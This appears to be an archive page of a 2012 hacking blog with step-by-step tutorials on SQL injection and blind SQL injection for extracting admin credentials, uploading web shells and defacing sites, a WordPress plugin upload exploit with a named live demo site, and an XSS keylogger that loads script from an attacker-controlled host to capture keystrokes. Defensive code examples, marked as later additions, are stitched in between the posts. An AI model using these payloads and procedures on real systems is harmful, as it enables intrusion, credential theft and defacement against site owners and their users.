Showing posts with label Website Hacking. Show all posts

Friday, 31 August 2012

How To Find Vulnerabilities On A Website (Web Vulnerability)


As we all know, websites get hacked because of vulnerabilities that exist on the site, so today I will give a brief article on finding web vulnerabilities.

Nowadays hackers concentrate a lot of their effort on finding holes in web applications, and this is the major reason why thousands of websites are getting hacked. If you are a website owner with a high PageRank and high traffic, there is a chance that you might become a victim of these hackers.

A few years back there were no proper tools to search for vulnerabilities, but nowadays there are tons of tools available through which even a newbie can find a vulnerable site and start hacking.

Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website but most common ones are as follows:

1. SQL Injection
2. XSS (Cross Site Scripting)
3. Remote File Inclusion (RFI)
4. Remote File Upload Vulnerability (Exploits)
5. Local File Inclusion (LFI)
6. DDoS attack
7. Google Dorks


And many more; see the category box on the left side.

I have put in my effort and written about all these types of attack on my site, with detailed tutorials, a few with examples. Please go through them if you want to be a real hacker.

Now, some of the tools that are most used by hackers to hack a website or find vulnerabilities on a website.

Tools Used By Hackers To Find Website Vulnerabilities

Acunetix:

Acunetix is one of my favorite tools for finding vulnerabilities in any web application. It automatically checks your web applications for SQL injection, XSS and all other web vulnerabilities.

Nessus:

Nessus is the best Unix vulnerability testing tool and among the best to run on Windows. Key features of this software include remote and local file security checks, a client/server architecture with a GTK graphical interface, etc.

Retina:

Retina is another vulnerability assessment tool. It scans all the hosts on a network and reports any vulnerabilities found.


Metasploit Framework:

The Metasploit Framework is the open source penetration testing framework with the world's largest database of public and tested exploits.

Thanks For Reading

Keep Visiting :- Indicyborg

Sunday, 26 August 2012

SQL Injection And Defacement For Beginners Complete Tutorial


1. What is SQL Injection?

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

2. What is Defacement ?

A website defacement is an attack on a website that changes the visual appearance of the site. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own.
 
What you need before you start with SQL injection:

* An admin finder (to find the admin panel of a website)
* An SQL injection vulnerability scanner

 
Admin Finder:
Download Admin Finder
 
Vulnerable Scanner:
Download ADVANCED HAVIJ Scanner

Dorks for Finding Vulnerable sites!:
Common Dorks

inurl:members.php?id=
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=


MD5 Hash Crackers Online:

http://www.md5crack.com
http://www.md5decrypter.com
http://www.md5decrypter.co.uk
http://md5.rednoize.com
http://md5decryption.com
http://passcracking.com
http://md5.my-addr.com/md5_decrypt-md5_c…r_tool.php
http://www.xmd5.org
http://www.md5cracker.com/index.php
http://md5.noisette.ch/index.php
http://md5cracker.org


Text to ASCII Converter:

http://www.mikezilla.com/exp0012.html?ascii=login&hex=%2578&unicode=%26%23120;
http://getyourwebsitehere.com/jswb/text_to_ascii.html


Shell:
 
http://www.kinginfet.net/shells/

Some vulnerable websites
Starting Tutorial:


1. First you need to find vulnerable website.

http://sql-vuln-site.com/index.php?id=15

2. Now you need to find columns.

http://sql-vuln-site.com/index.php?id=15 order by 1-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 2-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 3-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 4-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 5-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 6-- ( error )


The error looks like this:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’39′ at line 1
database query failure- SELECT * FROM texecom_sidemenu WHERE id=’39


3. Now select columns
The number of columns is 5


http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5–
 
4. Finding the version.
If you do not see which of the numbers 1, 2, 3, 4 is shown in bold, try each of them.
I chose 1.


http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT @@version,2,3,4,5–

You get the version like this:
5.0.32-Debian_7etch11-log

5. Finding Tables
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables–
And you will get tables like this:
PRODUCTS, ADMINS, and others
There must be a table with a name like: admin, users, user, login, client.
 

6. Finding Columns in the Table ADMINS.

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char()–


We found the ADMINS table; now go to the ASCII converter website and convert ADMINS.
You will get this: &#65;&#68;&#77;&#73;&#78;&#83;
Remove &# and replace ; with ,
Like this: 65,68,77,73,78,83
You put table_name=char(65,68,77,73,78,83)–

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char(65,68,77,73,78,83)–

And you will get the columns in the table ADMINS.
There need to be columns with names like: username and password
 
7. Getting username and password.

Now we use concat(username,0x3a,password) with the admins table

http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins–

(0x3a is the hex ASCII code for ':')

8. Found username and password
So you found the username and password.
If the password is a hash like this: 2510c39011c5be704182423e3a695e91
you will need to use the online MD5 hash crackers.
If the password is not hashed you are lucky, and now you need to find the admin panel.

9. Finding Admin Panel

Open the Admin Finder tool.
Put the website in the box below and click Scan.
So you found the admin panel and it looks like this: http://sql-vuln-site.com/admin/login.php

You open the website and it has Username: and Password: fields.
Put in the username and password that you got.
Done, you are logged in to the admin panel; let's upload a shell and deface.

10. Uploading Shell and Add Deface

In the admin panel, search the categories or anywhere else where you can upload a file or picture.
When you have found one, download a shell from the website I told you about before starting the tutorial and try to upload your shell, like r57.php. When you upload it you will see the link of the upload; open it like this:

http://sql-vuln-site.com/upload/r57.php

If you can't upload r57.php, change it to r57.jpg.php or r57.txt and try!

You need to make a deface page in HTML and put it on the website.
So you open the shell; you will find a file index.php. Click on it, remove the PHP code from the index and put in your HTML code.
 
Congratulations, you defaced the website.


Thanks For Reading..


Thursday, 23 August 2012

How To Hack Using Sqli Sql Injection + Sql Injection Complete Tut


Yesterday I posted an article on BLIND SQLI TO HACK WEBSITE. Today I am posting the basics of hacking, that is, SQL injection.

As we all know, a large number of websites are vulnerable to SQL injection attacks these days. Here I am going to discuss what SQL injection is and how it is done to hack a website. Nowadays, many noobs find an SQL error in a database with automated scanners and just exploit it for fun. Even I haven't used my skills for any bad purpose. This post is for those people who don't know that their website is actually vulnerable to such an attack; I am also going to tell you how it is done and how to catch this vulnerability. Due to such a vulnerability a hacker can gain access to your website within a minute.

What is SQL Injection Actually?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
In simple words, the hacker injects certain characters in the admin authentication area and gains access as admin.

How is basic SQL injection Accomplished?

Google is very helpful in hacking, thanks to the dork technique. Now you will ask: what is a dork?

Dork: A search query to find websites specific to an attack type, etc.

A few dorks are below, which are used to find vulnerable sites:

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"

These dorks are pasted in the search bar of google.com and then searched to find the website.

After finding the required target, the injection is carried out in the admin login fields; the following injections are inserted as the password:

    '1'='1' or'1'(works on 99% of sites best one by me)
    ' or '1'='1
    ' or 'x'='x



In simple words:

Username : Admin
Password : 'or'1'='1


Hit login and you are in. Not all sites are vulnerable, and this is just for learning purposes. We are not responsible for any harm or damage caused.

That was just a simple tutorial to give you basic information on SQL injection. There are more advanced techniques too, but I will discuss them some other day.
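The password strings above only work when the login query is built by pasting user input into the SQL text. The following is an added example, not code from the original post: it contrasts such a concatenated query with a parameterized one using Python's sqlite3 module. The admins table layout, the constructed account and the function names are assumptions made for the illustration.

```python
import hashlib
import hmac
import os
import sqlite3


def hash_password(password, salt):
    # Salted PBKDF2 instead of a bare MD5 digest.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    """In-memory database with one constructed admin account."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE admins (username TEXT, password TEXT, salt BLOB, pw_hash BLOB)"
    )
    salt = os.urandom(16)
    secret = "s3cret-constructed"
    # The plaintext column exists only so the vulnerable query below has
    # something to compare against; a real table would keep the hash only.
    db.execute(
        "INSERT INTO admins VALUES (?, ?, ?, ?)",
        ("Admin", secret, salt, hash_password(secret, salt)),
    )
    return db


def login_vulnerable(db, username, password):
    # User input becomes part of the SQL text, so a quote character in the
    # password changes the structure of the WHERE clause.
    sql = (
        "SELECT username FROM admins "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    # The placeholder keeps the input as data. The password never enters the
    # SQL at all; it is verified in code against the salted hash.
    row = db.execute(
        "SELECT salt, pw_hash FROM admins WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(hash_password(password, salt), stored)


if __name__ == "__main__":
    db = make_db()
    injected = "' or '1'='1"
    print("concatenated query accepts injected password:",
          login_vulnerable(db, "Admin", injected))
    print("parameterized query accepts injected password:",
          login_parameterized(db, "Admin", injected))
    print("parameterized query accepts real password:",
          login_parameterized(db, "Admin", "s3cret-constructed"))
```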

How to check that your website is vulnerable?

This is the most important part in hacking.

Well then, after reading the basics above you should have got the concept of SQL injection. Many tools are also available to scan your website or server for such errors in the database. Note: when an error occurs, it means that the website is vulnerable.

First Method:
 

Here is an online scanner:

    http://webhosting.blackoutaio.com/~sqli/

For example, if you want to scan www.website-wamiq.com, then put this in the scanner bar:

    inurl:php?=id+site:website-wamiq.com

If you get:

    http://www.website-wamiq.com/product.php?id='3 <== Success





Then it means that the website is vulnerable and can be exploited easily by getting the number of columns.
(Note: catid, data and num are also used in addition to id. Simply replace id with your desired value in the dork of the scanner.)
Here I took a screenshot of a website, found with the dork "data" instead of "id", that is vulnerable to the attack; the scanner has scanned it overall and here are the results:

Second Method:

Here is an automated scanner, which is for newbies: just click scan and take a rest.
Go to this link to get detailed information on how to find SQL vulnerabilities in a website.
To get the Acunetix vulnerability scanner trial version go here.


I hope you are now aware of SQL injection. Further information will be posted later.


Thanks For Reading This :p


Wednesday, 22 August 2012

Blind Sqli Tutorial To Hack A Website


Blind SQLi is one of the most famous techniques to hack a website. It is being used by many great hackers all over the world to hack many banking websites as well as many popular websites.
Even today millions of websites are vulnerable; they can be taken down and credential information can be leaked using this "Blind SQLi".

Here is the complete step by step tutorial


Before going into it, let's understand what blind SQLi is.

Blind SQL injection is used when a web application is vulnerable to SQL injection but the results of the injection are not visible to the attacker. That is to say, the page with the vulnerability may not be one that displays data, but it will display differently depending on the logical statement injected. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.

The steps begin here:
Suppose that you want to hack a website with blind SQLi; for that you have to find a link of the type shown below.

http://site.com/index.php?id=5


When we open this, we see a page with some articles, pictures, etc.

Then we want to test it for a blind SQL injection attack:


http://www.site.com/index.php?id=5 and 1=1

This is always true and the page loads normally, that's OK.

Now the real test:
 
http://www.site.com/index.php?id=5 and 1=2

This is false.

So if some text, picture or other content is missing on the returned page, then that site is vulnerable to blind SQL injection.

1) Get the MySQL version

To get the version in a blind attack we use substring, i.e.

http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4

This should return TRUE if the version of MySQL is 4.

Replace 4 with 5, and if the query returns TRUE then the version is 5,

i.e.
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works
When select doesn't work, we use subselect,

i.e.
http://www.site.com/index.php?id=5 and (select 1)=1

If the page loads normally then subselects work.
Then we check whether we have access to mysql.user,

i.e.
http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1

If the page loads normally we have access to mysql.user, and later we can pull some passwords using the load_file() function and OUTFILE.

3). Check table and column names

This is the part where guessing is your best friend,
i.e.

http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1

(With limit 0,1 our query returns 1 row of data, because a subselect returns only 1 row; this is very important.)

Then if the page loads normally without content missing, the table users exists.

If you get FALSE (some article missing), just change the table name until you guess the right one :)

Let's say that we have found that the table name is users; now what we need is a column name.

The same as with the table name, we start guessing. Like I said before, try the common names for columns,

i.e.

http://www.site.com/index.php?id=5 and (select substring(concat(1,
password),1,1) from users limit 0,1)=1


If the page loads normally we know that the column name is password (if we get false, then try common names or just guess).

Here we merge 1 with the column password, then substring returns the first character (,1,1).


4). Pull data from database


We found the table users with the columns username and password, so we are going to pull characters from that.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>80


OK, this pulls the first character of the first user in the table users.
substring here returns the first character, 1 character in length.
ascii() converts that 1 character into its ASCII value, which is then compared using the greater-than symbol ">".

So if the ASCII value of the character is greater than 80, the page loads normally (TRUE).

We keep trying until we get FALSE.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>95


we get TRUE, keep incrementing
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>98


TRUE again, higher


http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!


So the first character in username is char(99). Using the ASCII converter we know that char(99) is the letter 'c'.
Then let's check the second character.


http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),2,1))>99


Note that I changed ,1,1 to ,2,1 to get the second character (now it returns the second character, 1 character in length).

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!


We know that the second character is char(105), and that is 'i'. We have 'ci' so far.

So keep incrementing until you reach the end (when >0 returns false we know that we have reached the end).
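Seen from the server side, both the ORDER BY / UNION walkthrough in the earlier post and the character-by-character requests above leave a recognisable trail in the web server access log. The following detector is an added example, not part of the original posts; the log lines are constructed, and the signature names, the regular expressions and the threshold of three requests are assumptions chosen for the illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache-style access log (documentation IP ranges, sample paths).
SAMPLE_LOG = """\
198.51.100.20 - - [22/Aug/2012:10:00:01 +0000] "GET /index.php?id=15 HTTP/1.1" 200 5120
203.0.113.7 - - [22/Aug/2012:10:01:09 +0000] "GET /index.php?id=15%20order%20by%206-- HTTP/1.1" 200 412
203.0.113.7 - - [22/Aug/2012:10:01:30 +0000] "GET /index.php?id=15+UNION+ALL+SELECT+1,2,3,4,5-- HTTP/1.1" 200 5201
203.0.113.7 - - [22/Aug/2012:10:02:02 +0000] "GET /index.php?id=15+UNION+ALL+SELECT+table_name,2,3,4,5+from+information_schema.tables-- HTTP/1.1" 200 6400
203.0.113.9 - - [22/Aug/2012:11:15:00 +0000] "GET /index.php?id=5%20and%201=2 HTTP/1.1" 200 2100
203.0.113.9 - - [22/Aug/2012:11:15:04 +0000] "GET /index.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E80 HTTP/1.1" 200 5120
203.0.113.9 - - [22/Aug/2012:11:15:05 +0000] "GET /index.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E95 HTTP/1.1" 200 5120
203.0.113.9 - - [22/Aug/2012:11:15:06 +0000] "GET /index.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))%3E98 HTTP/1.1" 200 5120
198.51.100.20 - - [22/Aug/2012:11:20:00 +0000] "GET /search.php?q=order+by+mail HTTP/1.1" 200 900
"""

# client IP, request target and status code of a common-log-format line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+')

# Signatures are matched against the URL-decoded, lower-cased query string.
SIGNATURES = {
    "order-by-probe": re.compile(r"\border\s+by\s+\d+"),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema-enum": re.compile(r"\binformation_schema\b|\bmysql\.user\b"),
    "version-probe": re.compile(r"@@version"),
    "boolean-test": re.compile(r"\band\s+\d+\s*=\s*\d+"),
    "char-extraction": re.compile(r"\bascii\s*\(\s*substring\s*\("),
}


def scan(log_text):
    """Return (client_ip, decoded_query, matched_signature_names) per hit."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, target, _status = m.groups()
        query = unquote_plus(urlsplit(target).query).lower()
        hits = sorted(n for n, rx in SIGNATURES.items() if rx.search(query))
        if hits:
            findings.append((ip, query, hits))
    return findings


def blind_extraction_clients(findings, min_requests=3):
    """Clients that sent repeated character-comparison requests."""
    counts = Counter(ip for ip, _q, hits in findings if "char-extraction" in hits)
    return sorted(ip for ip, n in counts.items() if n >= min_requests)


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for ip, query, hits in results:
        print(ip, ",".join(hits), query[:60])
    print("blind extraction suspected from:", blind_extraction_clients(results))
```

The benign search for "order by mail" is not flagged because the probe signature requires a numeric column index; matching on the decoded query rather than the raw line is what catches the %20 and + encoded variants.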

Thankz For Reading


Friday, 10 August 2012

Quick Tips About Wordpress Defacing


Wordpress Defacing without uploading Shell

Usually, after gaining admin access on a WordPress website, we upload a shell to the website, which takes some extra time. You can even deface WordPress's index page without uploading a shell!
Go to the WordPress dashboard, then the theme editor, and you'll see 2-3 themes there, like Twenty Ten and Twenty Eleven.
Look for the active theme on that website and edit the index.php of that theme, and you'll see your deface page on the website's home page.


Bypassing Permission Denied for index.php in WordPress

Sometimes, after uploading a shell to a WordPress website, when you try to replace the source code of index.php in the public_html/ directory with your deface page, it will show an error like permission denied, can't write to file, etc., and sometimes changing the permissions doesn't work. Then follow the same method given above: change the active theme's index.php file and the home page will change to your deface page.

Simple :)


Two factor Authentication on wordpress

What is two factor authentication ?

Two-factor authentication is commonly found in electronic computer authentication, where basic authentication is the process of a requesting entity presenting some evidence of its identity to a second entity. Two-factor authentication seeks to decrease the probability that the requestor is presenting false evidence of its identity.

Duo Security Overview

Duo Security provides two-factor authentication as a service built to prevent account takeover and online fraud. Protect remote access with drop-in support for most VPNs and Unix, or add login or transaction verification to any website with Duo's powerful web APIs.

Benefits using Duo Security

Compliance: Easily meet federal and industry regulations for strong authentication such as PCI DSS and HIPAA.
Cost-effective: No hardware to deploy and manage, and self-service user enrollment to reduce administrative burden.
Scalable: Duo leverages the cloud to rapidly scale as your user base grows, removing the need for onsite infrastructure.
Compatible: Integrates seamlessly with existing technology investments and end-user smartphone platforms.

The content of this article, "Two-Factor Authentication on WordPress", is for the public to know more about it, and the information is provided by various sources.

WordPress Exploit: 10,000+ Websites Are Vulnerable To This Attack

This vulnerability is known as the WordPress Easy Comment Upload vulnerability.
Google dorks:


"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads


Open Google and enter any of the dorks given above.
Now select any website
and go to this URL: site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll get an upload option here :)
Now upload your deface ....
and check it here: site.com/wp-content/uploads/2011/05/yourfilehere


Note: On some websites you can upload your deface in txt format only, and you can upload a shell on only 50% of sites. Upload the shell in image format, e.g. shell.asp;.jpg
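The file names mentioned in this post and in the defacement tutorial above (r57.php, r57.jpg.php, r57.txt, shell.asp;.jpg) get through because the upload handler trusts the client's file name. The following validator is an added example, not code from the plugin or from the original post; the allowlist, the function name and the sample byte strings are assumptions made for the illustration.

```python
import os
import re
import secrets

# Allowed extensions mapped to the leading bytes a real file of that type has.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Exactly one dot, no ';', no spaces, no path separators.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.[A-Za-z0-9]+$")


def validate_upload(client_name, data):
    """Return (True, stored_name) or (False, reason) for an uploaded file."""
    base = os.path.basename(client_name.replace("\\", "/"))
    if base != client_name:
        return False, "path components in filename"
    if not SAFE_NAME.match(base):
        # Rejects double extensions such as name.jpg.php and the
        # semicolon form name.asp;.jpg.
        return False, "filename has extra dots or unsafe characters"
    ext = base.rsplit(".", 1)[1].lower()
    magic = ALLOWED.get(ext)
    if magic is None:
        return False, "extension not on allowlist"
    if not data.startswith(magic):
        return False, "content does not match extension"
    # The client's name is discarded; the file is stored under a random name
    # so the uploader cannot choose or predict the final path.
    return True, secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    script_bytes = b"<?php /* constructed placeholder */ ?>"
    jpeg_bytes = b"\xff\xd8\xff\xe0" + b"\x00" * 16  # constructed JPEG header
    samples = [
        ("r57.php", script_bytes),
        ("r57.jpg.php", script_bytes),
        ("r57.txt", script_bytes),
        ("shell.asp;.jpg", jpeg_bytes),
        ("photo.jpg", script_bytes),
        ("photo.jpg", jpeg_bytes),
    ]
    for name, data in samples:
        print(name, "->", validate_upload(name, data))
```

Name checks are only one layer: the upload directory should also be served with script execution disabled, so that a file which slips through is returned as data and never run.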

DEMO:
http://www.findthepearl.com/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/



Happy Hacking :p

How to Hack A Website using Xss Attack Keylogging

As we all know, a keylogger is a program that allows us to view the keys pressed by a user. In this tutorial we will learn how to use a keylogger on a website to capture all the keystrokes on that page.
As I said previously, an XSS attack (cross-site scripting) is simple, but it can be used in a deadlier way.

This tutorial only works on XSSed sites ...

As we know, we can run our own scripts on websites that have an XSS vulnerability. We use our keylogging script on an XSS-vulnerable website.

To perform this attack we need three things:

An XSSed site (that is, an XSS-vulnerable site)

A web hosting service (free)

A keylogging script


First of all, download the script from the link below.

Download Script

Now create an account on any free web host that supports PHP. PHP will be used to write the keystrokes to a text file.

Now open Logger.js and change the URL of your script. The default URL is http://yourwebsite.com; just change it to your hosting URL.


Now host all these scripts on your web host.

Now find an XSS-vulnerable website and include the script link like this:
 
http://targetwebsite.com/search.php?q="<script src="http://yourwebsite.com/keylogger.js"></script>

Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script.

If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords.

I hope you like this topic...

Thursday, 9 August 2012

XSS : Cross Site Scripting complete Tutorial



Hello friends, today I am back with one of the most famous website hacking tutorials, on the "XSS attack".
A number of the world's best sites, including Microsoft, Google, Facebook, YouTube and many more top company sites, are vulnerable to XSS attacks. Even today hackers from all over the world use XSS (Cross Site Scripting) to find vulnerabilities on the best websites.

Here is the detailed tutorial on XSS/Cross Site Scripting and also on how to exploit it.

What is XSS?, what can I accomplish with it?

XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.

Reason Behind XSS vulnerability?

Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly allowing us to inject strings into the source code, that would then give us the conclusion of what we put in since it's also in the source code. They did not bother to filter what we type in. They allowed characters such as ">, ", /", etc.
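The missing filtering described above, and the script-tag injection used in the keylogging post, are both closed by encoding user input when it is written into the page and by restricting where scripts may load from. The following is an added example, not code from the original posts: it renders a search page with and without output encoding and parses the result the way a browser would. The page template, the function names and the policy string are assumptions made for the illustration.

```python
import html
from html.parser import HTMLParser

TEMPLATE = '<input name="q" value="%s"><p>Results for %s</p>'

# script-src 'self' refuses inline script blocks and scripts from other hosts.
CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"


def render_search_vulnerable(q):
    # Reflects the query verbatim into an attribute and into the page body.
    return TEMPLATE % (q, q)


def render_search_escaped(q):
    # html.escape turns < > & " ' into entities, so the browser treats the
    # input as text in both the attribute and the body context.
    safe = html.escape(q, quote=True)
    return TEMPLATE % (safe, safe)


def response_headers():
    # Second layer: even if an encoding call is missed somewhere, the browser
    # is told not to run injected or third-party scripts.
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": CSP,
    }


class TagCollector(HTMLParser):
    """Records the elements a parser actually sees in the markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")


def parsed_tags(markup):
    """Return (list of start tags, decoded value of the search box)."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.input_value


if __name__ == "__main__":
    # The test strings from this tutorial, without the '*' characters.
    for payload in ("<script>alert('XSS');</script>",
                    "\"><script>alert('XSS');</script>"):
        print("unescaped:", parsed_tags(render_search_vulnerable(payload))[0])
        print("escaped:  ", parsed_tags(render_search_escaped(payload))[0])
    print(response_headers()["Content-Security-Policy"])
```

In the escaped rendering the parser sees only the input and p elements, and the search box still shows the user's original text because the entities decode back to the same characters.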

Types of XSS

There are two types of XSS. Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it's still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leave messages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.
We are discussing here the basics of XSS and cookie logging.

Tutorial On XSS

How to test for XSS vulnerabilities.

To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We've found a search box and now we want to use Javascript to alert a message so we can see if the Javascript was successfully executed.

**<*script*>alert('XSS');

(Important: Please remove "*", or type the above text in the search box without "*")

Now we will see a pop-up message "XSS".

In some cases, a message might not pop up. If it doesn't work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.

"*>*alert('XSS');
(Important: Please remove '*', or type the above text in the search box without '*')

Now we have found out that it is vulnerable. Let's go to the next step.

Deface/Hacking a webpage with XSS?

Here is the important part that explains defacing a website. I have methods for both persistent and non-persistent XSS.

Persistent XSS.

First I will be starting with persistent XSS. Since it's persistent, I want to redirect my victims to a deface page. We simply inject some more Javascript like we did before:

<*script*>window.location="*http://yourdefacepage.com/index.html";<*/script*>

(Important: Please remove '*', or type the above text in the search box without '*')

Remember, you can always alter the code if it doesn't work. You can do many things with XSS, you just need all the right strings. I'm only focusing on defacing, since most people just deface sites these days.

Non-persistent XSS.

Obviously we can't redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.

I will be posting how to make a cookie logger soon; stay in touch with IndiCyborg.